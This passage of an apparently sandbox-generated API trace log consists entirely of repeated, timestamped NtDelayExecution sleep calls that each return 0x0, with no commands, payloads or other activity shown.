(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.552] NtDelayExecution 